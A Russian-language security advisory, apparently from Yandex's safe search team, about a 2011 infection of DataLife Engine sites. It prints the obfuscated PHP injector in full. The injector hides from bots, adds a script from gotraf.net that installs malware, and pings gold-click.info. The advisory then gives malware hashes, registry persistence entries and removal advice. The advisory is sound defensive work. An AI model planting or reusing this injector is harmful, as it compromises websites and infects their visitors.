Мы обнаружили, что в последнее время стали чаще происходить случаи заражения сайтов, работающих на CMS DataLife Engine кодом, который добавляет на страницу тег <script>. Пример кода, которым происходит заражение:
<? $GLOBALS['_dleget_']=Array(base64_decode('' .'cHJlZ19' .'tYX' .'RjaA=='),base64_decode('cH' .'JlZ19' .'tYXRjaA=='),base64_decode('cHJlZ19tY' .'XRjaA==')); ?><? function dleget($i){$a=Array('ZGxlX3Bhc3N3b3Jk','L3lhbmRleC9p','SFRUUF9VU0VSX0FHRU5U','L2dvb2dsZS9p','SFRUUF9VU0VSX0FHRU5U','L2JvdC9p','SFRUUF9VU0VSX0FHRU5U', PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly9nb3RyYWYubmV0L2luLnBocD9pZD0xMTEiPjwvc2NyaXB0Pg== ');return base64_decode($a[$i]);} ?><? if((!isset($_COOKIE[dleget(0)]))and(!$GLOBALS['_dleget_'][0](dleget(1),$_SERVER[dleget(2)]))and(!$GLOBALS['_dleget_'][1](dleget(3),$_SERVER[dleget(4)]))and(!$GLOBALS['_dleget_'][2](dleget(5),$_SERVER[dleget(6)]))){echo dleget(7);} if(isset($_SERVER["HTTP_HOST"])){ $host = str_replace("www.","",$_SERVER["HTTP_HOST"]); file_get_contents('http://gold-click.info/tds.php?jkdptbw='.$host);} ?>
Данный код проверяет, установлены ли cookie с именем dle_password и присутствуют ли в значении HTTP-заголовка User-Agent следующие строки:
- yandex
- bot
Если cookie с именем dle_password не установлены и в значении HTTP заголовка User-Agent не присутствует строк yandex, google или bot, то в код страницы вставляется:
<script src=http://gotraf.net/in.php?id=<id>
Общие рекомендации, как удалить со страницы вредоносный код и больше не дать его разместить, описаны в соответствующем разделе помощи. Узнать подробности о том, какие страницы заражены, можно, зарегистрировав заражённый сайт на Яндекс.Вебмастере.
При посещении сайта, который использует CMS, зараженную данным серверным скриптом, в браузере автоматически исполняется браузерный скрипт, подгружаемый с хоста gotraf.net. Этот браузерный скрипт пытается эксплуатировать уязвимости в популярных браузерах и сторонних продуктах. При удачной эксплуатации хотя бы одной из уязвимостей на компьютер пользователя загружается и устанавливается вредоносное ПО.
По данным с virustotal.com, на 19.07.2011 вредоносное ПО с хоста gotraf.net детектировалось только антивирусами:
Хэши вредоносного файла:
- MD5: c852cb73a67be8080b292577e77349d0 ;
- SHA1: d66db7ab31b5b6ac83cb17b58e40f1eca3acc2d9 ;
- SHA256: d01d44972e2e853907ec0f6ac
aa9ff60bb797825c0dd107655 f1b963c70ce2a1 .
Вирус блокирует работу операционной системы, копирует себя в папку C:\Program Files\Common Files\ с именем winlogin.exe, а также создает 2 записи в реестре, чтобы при каждом последующем старте операционной системы происходил его запуск.
Записи в реестре:
- HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Winlogon\Shell = Explorer.exe "C:\Program Files\Common Files\winlogin.exe" ;
- HKEY_LOCAL_MACHINE\softwa
re\microsoft\Windows\Curr .entVersion\Run\winlogin = "C:\Program Files\Common Files\winlogin.exe"
Для удаления вируса с компьютера пользователя вручную, нужно удалить соответствующие записи в реестре, а также файл winlogin.exe (не перепутайте с winlogon.exe) .
Чтобы удалить вирус, можно также воспользоваться бесплатными утилитами от Лаборатории Касперского и DrWeb, приведёнными в этом разделе.
Как выбрать и настроить браузер, антивирус, брандмауэр, ОС компьютера, чтобы обеспечить максимальную безопасность работы в Интернете – описано здесь.
Команда безопасного поиска Яндекса